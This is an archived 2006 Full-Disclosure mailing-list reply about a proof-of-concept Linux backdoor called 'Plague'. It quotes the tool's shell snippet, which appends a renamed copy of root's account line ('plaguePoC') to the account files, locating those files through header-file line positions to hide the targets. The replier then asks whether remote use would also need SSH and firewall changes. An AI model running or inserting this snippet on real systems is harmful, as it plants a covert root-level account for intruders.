[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Plague Proof of Concept Linux backdoor

To: "J. Oquendo" <sil@xxxxxxxxxxxxxxx>
Subject: Re: [Full-disclosure] Plague Proof of Concept Linux backdoor
From: "Dude VanWinkle" <dudevanwinkle@xxxxxxxxx>
Date: Sun, 22 Oct 2006 03:08:44 -0400

On 10/22/06, J. Oquendo <sil@xxxxxxxxxxxxxxx> wrote:
>
> Plague is an odd proof of concept backdoor keeping
> tool based on the premise of using existing system
> files and commands to keep and maintain a backdoor
> on Linux systems. I could have modified this for
> BSD, Solaris, etc., but I didn't feel like doing
> the work...
>
> http://www.infiltrated.net/plague
>

(from the link)

if [ -e /usr/include/paths.h ]

then

        file=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h`
        sed -n '1p' $file|sed 's/root/plaguePoC/g' >> $file
        file2=`awk 'NR==74 {print $8}' /usr/include/sysexits.h`
        sed -n '1p' $file2|sed 's/root/plaguePoC/g' >> $file2   

fi

--------------------------------

So this backdoor wouldnt work remotely, correct? You would need to add
the user to the people allowed to ssh in, and poke a hole for ssh in
the firewall./?

-JP

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] Plague Proof of Concept Linux backdoor
  - From: hijacker

References:
- [Full-disclosure] Plague Proof of Concept Linux backdoor
  - From: J. Oquendo

Prev by Date: Re: [Full-disclosure] Windows Bugged
Next by Date: Re: [Full-disclosure] Who is n3td3v?
Previous by thread: [Full-disclosure] Plague Proof of Concept Linux backdoor
Next by thread: Re: [Full-disclosure] Plague Proof of Concept Linux backdoor
Index(es):
- Date
- Thread